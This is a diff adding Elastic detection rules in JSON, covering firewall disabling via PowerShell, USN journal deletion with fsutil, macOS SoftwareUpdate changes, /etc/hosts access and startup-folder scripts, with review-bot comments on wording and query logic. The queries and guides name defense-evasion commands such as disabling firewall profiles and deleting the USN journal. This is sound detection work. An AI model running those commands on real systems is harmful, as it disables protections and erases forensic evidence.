"technique": [ + { + "id": "T1069", + "name": "Permission Groups Discovery", + "reference": "https://attack.mitre.org/techniques/T1069/", + "subtechnique": [ + { + "id": "T1069.001", + "name": "Local Groups", + "reference": "https://attack.mitre.org/techniques/T1069/001/" + }, + { + "id": "T1069.002", + "name": "Domain Groups", + "reference": "https://attack.mitre.org/techniques/T1069/002/" + } + ] + }, + { + "id": "T1087", + "name": "Account Discovery", + "reference": "https://attack.mitre.org/techniques/T1087/", + "subtechnique": [ + { + "id": "T1087.001", + "name": "Local Account", + "reference": "https://attack.mitre.org/techniques/T1087/001/" + }, + { + "id": "T1087.002", + "name": "Domain Account", + "reference": "https://attack.mitre.org/techniques/T1087/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 3 + }, + "id": "f638a66d-3bbf-46b1-a52c-ef6f39fb6caf_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f63c8e3c-d396-404f-b2ea-0379d3942d73_109.json b/packages/security_detection_engine/kibana/security_rule/f63c8e3c-d396-404f-b2ea-0379d3942d73_109.json new file mode 100644 index 00000000000..efaeed2f944 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f63c8e3c-d396-404f-b2ea-0379d3942d73_109.json 
@@ -0,0 +1,131 @@ +{ + "attributes": { + "author": [ + "Austin Songer" + ], + "description": "Identifies when the Windows Firewall is disabled using PowerShell cmdlets, which can help attackers evade network constraints, like internet and network lateral communication restrictions.", + "false_positives": [ + "Windows Firewall can be disabled by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Windows Profile being disabled by unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Windows Firewall Disabled via PowerShell", + "note": "## Triage and analysis\n\n### Investigating Windows Firewall Disabled via PowerShell\n\nWindows Defender Firewall is a native component that provides host-based, two-way network traffic filtering for a device and blocks unauthorized network traffic flowing into or out of the local device.\n\nAttackers can disable the Windows firewall or its rules to enable lateral movement and command and control activity.\n\nThis rule identifies patterns related to disabling the Windows firewall or its rules using the `Set-NetFirewallProfile` PowerShell cmdlet.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Check whether the user is an administrator and is legitimately performing troubleshooting.\n- In case of an allowed benign true positive (B-TP), assess adding rules to allow needed traffic and re-enable the firewall.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Re-enable the firewall with its desired configurations.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.action == \"start\" and\n (process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") or ?process.pe.original_file_name == \"PowerShell.EXE\") and\n process.args : \"*Set-NetFirewallProfile*\" and\n (process.args : \"*-Enabled*\" and process.args : \"*False*\") and\n (process.args : \"*-All*\" or process.args : (\"*Public*\", \"*Domain*\", \"*Private*\"))\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/netsecurity/set-netfirewallprofile?view=windowsserver2019-ps", + "https://www.tutorialspoint.com/how-to-get-windows-firewall-profile-settings-using-powershell", + "http://powershellhelp.space/commands/set-netfirewallrule-psv5.php", + "http://woshub.com/manage-windows-firewall-powershell/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "f63c8e3c-d396-404f-b2ea-0379d3942d73", + "setup": "## Setup\n\nIf enabling an EQL rule on a 
non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.004", + "name": "Disable or Modify System Firewall", + "reference": "https://attack.mitre.org/techniques/T1562/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "f63c8e3c-d396-404f-b2ea-0379d3942d73_109", + "type": "security-rule" +} \ No newline at end of file 
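Review bot: The `false_positives` entry in f63c8e3c…_109.json says "Windows Profile being disabled by unfamiliar users should be investigated", which reads as a slip for the firewall profile; suggest "Windows Firewall profiles being disabled by unfamiliar users should be investigated." The `_110` hunk below carries the same text and only changes the endpoint index pattern to `logs-endpoint.events.process-*`, so both should be fixed together. Separately, this query keys on `event.action == "start"` while the sibling rule f675872f in this commit uses `event.type == "start"`; I cannot tell from the diff whether `event.action` is populated as `start` for the `endgame-*` and `winlogbeat-*` sources listed in `index`, so that is worth confirming or aligning with the sibling.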
diff --git a/packages/security_detection_engine/kibana/security_rule/f63c8e3c-d396-404f-b2ea-0379d3942d73_110.json b/packages/security_detection_engine/kibana/security_rule/f63c8e3c-d396-404f-b2ea-0379d3942d73_110.json
new file mode 100644
index 00000000000..a464f80f117
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/f63c8e3c-d396-404f-b2ea-0379d3942d73_110.json
@@ -0,0 +1,131 @@ +{ + "attributes": { + "author": [ + "Austin Songer" + ], + "description": "Identifies when the Windows Firewall is disabled using PowerShell cmdlets, which can help attackers evade network constraints, like internet and network lateral communication restrictions.", + "false_positives": [ + "Windows Firewall can be disabled by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Windows Profile being disabled by unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Windows Firewall Disabled via PowerShell", + "note": "## Triage and analysis\n\n### Investigating Windows Firewall Disabled via PowerShell\n\nWindows Defender Firewall is a native component that provides host-based, two-way network traffic filtering for a device and blocks unauthorized network traffic flowing into or out of the local device.\n\nAttackers can disable the Windows firewall or its rules to enable lateral movement and command and control activity.\n\nThis rule identifies patterns related to disabling the Windows firewall or its rules using the `Set-NetFirewallProfile` PowerShell cmdlet.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Check whether the user is an administrator and is legitimately performing troubleshooting.\n- In case of an allowed benign true positive (B-TP), assess adding rules to allow needed traffic and re-enable the firewall.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Re-enable the firewall with its desired configurations.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.action == \"start\" and\n (process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") or ?process.pe.original_file_name == \"PowerShell.EXE\") and\n process.args : \"*Set-NetFirewallProfile*\" and\n (process.args : \"*-Enabled*\" and process.args : \"*False*\") and\n (process.args : \"*-All*\" or process.args : (\"*Public*\", \"*Domain*\", \"*Private*\"))\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/netsecurity/set-netfirewallprofile?view=windowsserver2019-ps", + "https://www.tutorialspoint.com/how-to-get-windows-firewall-profile-settings-using-powershell", + "http://powershellhelp.space/commands/set-netfirewallrule-psv5.php", + "http://woshub.com/manage-windows-firewall-powershell/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "f63c8e3c-d396-404f-b2ea-0379d3942d73", + "setup": "## Setup\n\nIf enabling an EQL rule on a 
non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.004", + "name": "Disable or Modify System Firewall", + "reference": "https://attack.mitre.org/techniques/T1562/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "f63c8e3c-d396-404f-b2ea-0379d3942d73_110", + "type": "security-rule" +} \ No newline at end of file 
diff --git a/packages/security_detection_engine/kibana/security_rule/f675872f-6d85-40a3-b502-c0d2ef101e92_109.json b/packages/security_detection_engine/kibana/security_rule/f675872f-6d85-40a3-b502-c0d2ef101e92_109.json
new file mode 100644
index 00000000000..44b5a1ebf5c
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/f675872f-6d85-40a3-b502-c0d2ef101e92_109.json
@@ -0,0 +1,103 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies use of the fsutil.exe to delete the volume USNJRNL. This technique is used by attackers to eliminate evidence of files created during post-exploitation activities.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Delete Volume USN Journal with Fsutil", + "note": "## Triage and analysis\n\n### Investigating Delete Volume USN Journal with Fsutil\n\nThe Update Sequence Number (USN) Journal is a feature in the NTFS file system used by Microsoft Windows operating systems to keep track of changes made to files and directories on a disk volume. The journal records metadata for changes such as file creation, deletion, modification, and permission changes. It is used by the operating system for various purposes, including backup and recovery, file indexing, and file replication.\n\nThis artifact can provide valuable information in forensic analysis, such as programs executed (prefetch file operations), file modification events in suspicious directories, deleted files, etc. Attackers may delete this artifact in an attempt to cover their tracks, and this rule identifies the usage of the `fsutil.exe` utility to accomplish it.\n\nConsider using the Elastic Defend integration instead of USN Journal, as the Elastic Defend integration provides more visibility and context in the file operations it records.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - Verify if any other anti-forensics behaviors were observed.\n- Review file operation logs from Elastic Defend for suspicious activity the attacker tried to hide.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"fsutil.exe\" or ?process.pe.original_file_name == \"fsutil.exe\") and\n process.args : \"deletejournal\" and process.args : \"usn\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "f675872f-6d85-40a3-b502-c0d2ef101e92", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1070", + "name": "Indicator Removal", + "reference": "https://attack.mitre.org/techniques/T1070/", + "subtechnique": [ + { + "id": "T1070.004", + "name": "File Deletion", + "reference": "https://attack.mitre.org/techniques/T1070/004/" + } + ] + } + ] + } + ], + 
"timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "f675872f-6d85-40a3-b502-c0d2ef101e92_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f683dcdf-a018-4801-b066-193d4ae6c8e5_106.json b/packages/security_detection_engine/kibana/security_rule/f683dcdf-a018-4801-b066-193d4ae6c8e5_106.json new file mode 100644 index 00000000000..43013fdb53b --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f683dcdf-a018-4801-b066-193d4ae6c8e5_106.json 
@@ -0,0 +1,95 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies changes to the SoftwareUpdate preferences using the built-in defaults command. Adversaries may abuse this in an attempt to disable security updates.", + "false_positives": [ + "Authorized SoftwareUpdate Settings Changes" + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "SoftwareUpdate Preferences Modification", + "query": "event.category:process and host.os.type:macos and event.type:(start or process_started) and\n process.name:defaults and\n process.args:(write and \"-bool\" and (com.apple.SoftwareUpdate or /Library/Preferences/com.apple.SoftwareUpdate.plist) and not (TRUE or true))\n", + "references": [ + "https://blog.checkpoint.com/2017/07/13/osxdok-refuses-go-away-money/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "f683dcdf-a018-4801-b066-193d4ae6c8e5", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 106 + }, + "id": "f683dcdf-a018-4801-b066-193d4ae6c8e5_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f75f65cf-ed04-48df-a7ff-b02a8bfe636e_3.json b/packages/security_detection_engine/kibana/security_rule/f75f65cf-ed04-48df-a7ff-b02a8bfe636e_3.json new file mode 100644 index 00000000000..110d3937bb4 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f75f65cf-ed04-48df-a7ff-b02a8bfe636e_3.json 
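Review bot: The `not (TRUE or true)` exclusion in `query` covers only two spellings, while `defaults write … -bool` also accepts `yes`/`no` (the `defaults` man page lists `-bool[ean] (true | false | yes | no)`), so an administrator re-enabling updates with `-bool YES` still fires this rule, and the `-boolean` long form is never matched by the exact `"-bool"` term. Consider `and not (TRUE or true or YES or yes)` and listing `"-boolean"` alongside `"-bool"`. The rule also ships without a `note` investigation guide or a `Resources: Investigation Guide` tag, unlike the Windows rules in this commit; a short triage section describing which SoftwareUpdate preference changes are expected in the environment would help analysts act on a medium-severity alert.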
@@ -0,0 +1,89 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies the use of built-in tools to read the contents of \\etc\\hosts on a local machine. Attackers may use this data to discover remote machines in an environment that may be used for Lateral Movement from the current system.", + "from": "now-119m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "interval": "60m", + "language": "eql", + "license": "Elastic License v2", + "name": "System Hosts File Access", + "query": "process where event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\") and\nprocess.name in (\"vi\", \"nano\", \"cat\", \"more\", \"less\") and process.args == \"/etc/hosts\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "f75f65cf-ed04-48df-a7ff-b02a8bfe636e", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Rule Type: BBR", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1018", + "name": "Remote System Discovery", + "reference": "https://attack.mitre.org/techniques/T1018/" + } + ] + } + ], + "timestamp_override": "event.ingested", + 
"type": "eql", + "version": 3 + }, + "id": "f75f65cf-ed04-48df-a7ff-b02a8bfe636e_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f7c4dc5a-a58d-491d-9f14-9b66507121c0_110.json b/packages/security_detection_engine/kibana/security_rule/f7c4dc5a-a58d-491d-9f14-9b66507121c0_110.json new file mode 100644 index 00000000000..abc44ab4ba9 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f7c4dc5a-a58d-491d-9f14-9b66507121c0_110.json 
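Review bot: The `description` refers to `\\etc\\hosts` (rendering as `\etc\hosts`) although the rule is tagged `OS: Linux`/`OS: macOS` and the `query` matches `process.args == "/etc/hosts"`; the text should read `/etc/hosts` so it matches the detection. The wording "read the contents" also understates the scope slightly, since the `process.name` list includes the editors `vi` and `nano`; "read or edit" would describe what the rule actually catches.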
@@ -0,0 +1,110 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies script engines creating files in the Startup folder, or the creation of script files in the Startup folder. Adversaries may abuse this technique to maintain persistence in an environment.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.file*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Persistent Scripts in the Startup Directory", + "note": "## Triage and analysis\n\n### Investigating Persistent Scripts in the Startup Directory\n\nThe Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule looks for shortcuts created by wscript.exe or cscript.exe, or js/vbs scripts created by any process.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Startup Folder Persistence via Unsigned Process - 2fba96c0-ade5-4bce-b92f-a5df2509da3f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and\n\n file.extension : (\"lnk\", \"vbs\", \"vbe\", \"wsh\", \"wsf\", \"js\") and\n not (startsWith(user.domain, \"NT\") or endsWith(user.domain, \"NT\")) and\n\n /* detect shortcuts created by wscript.exe or cscript.exe */\n (file.path : \"C:\\\\*\\\\Programs\\\\Startup\\\\*.lnk\" and\n process.name : (\"wscript.exe\", \"cscript.exe\")) or\n\n /* detect vbs or js files created by any process */\n file.path : (\"C:\\\\*\\\\Programs\\\\Startup\\\\*.vbs\",\n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.vbe\",\n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.wsh\",\n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.wsf\",\n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.js\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + 